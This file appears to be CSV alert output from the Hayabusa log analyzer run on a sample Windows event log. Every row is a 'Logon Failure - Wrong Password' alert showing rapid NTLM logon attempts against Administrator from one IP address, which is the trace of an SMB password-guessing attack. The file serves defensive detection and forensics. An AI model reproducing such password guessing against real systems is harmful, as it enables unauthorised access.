2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ca4dlxyEco3VOapw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6lJc7DXAOcNZ2G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Olt5mS7na07VDJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCFeQcUMDTs0ev8v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYmH6CQrizoZ1DAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iYtujXkzySwZQFk8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KE9v6wzrebvjvDIl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81gmRFFBHI1s4dqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C8gHWPDjQM8M3tiQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: szj4mJvtFV06CuR2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ceGEl87hOM0InAAd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XRv3C3rRxYXTgckj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TaPkJPIQnbL3VyUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZ7PZAT6hWWHNc29 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJVD4uVhwfLSJ6Ab | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6KME1I6tE0v9UAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Qtt1rk4n3tOJko2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: prPsA8EZHGfGPSHm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQqGXnwHtB87LSzT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6uLT1bjaIS0XBsWC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIgpraQTxFrcLphN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1D6qy57XImq4prx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Kw44Ffh4DIPlyuM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oKUdmKU74RmJysAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZUTzZw0T1tYRSP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nEOfjuAMa7HTsfcP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e7bG19emMTmyBQNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YsLkgWukfqS3wWJK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: liFcZjjpY3xXwe9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBUgbfzx2OEcOxWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVCV0WoZmLTFNH71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJmxGOqck4oQi1kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w7lYqaUvEtTp18DK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ9xQmGn61JJDeQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XuMXpvY9fmLm0eBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ofesuNErTLWuN0k4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsNq7SThd3b8oTwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmRWg5gNRcxDMFjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JXrGn6LehVwTGNNj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIq9DS71jCjWbgdY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kw2BQbdUml0EPNOs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugOqsKQFGmmLac3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3rZHUbOUVBYiHarB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: otv8ByrbWWoTz7pi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HVlHkJu4Gxc9dhxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKF5OCqLVVKvung0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avAdpkOlP0xji1vG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VFgzMjEz6M0LBnX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdJb0obVAqkY9GCw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ciSoQcLUgLfzaNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RECrGCCTJuDPlvYJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Z2w67uyC2NOgecT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRVetRdHvz0lJkOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXrtxquzyzxKnQgD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWOoEIEem7Q9Mdx0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86n5nIm04810NptD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M08noHtTqqx3pxSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P983pRVfCVlVTyA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMKlcLvRhlx9FMcZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0gwEDgRF2wUgTDAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9Q2GSALfiuEbulo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DKTja76Qe9vSjrdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXuUyKlvaOgMNSu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X3qdEQReXwHAZUS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqtfHJKOfmWXEd4s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVv7vete3uXixggi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0PF6E3wRP0Tk39ss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: touwF4IXUahG7jvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lMOi7rygc7SJ5TPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QjM1K5eFSA9U37oE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HgzyZqFU9v2kDVvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hJeVj2h0sBxwBuGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FNXI8b6Zcj1zU3JY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9DyH9oxFbRTCQ80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
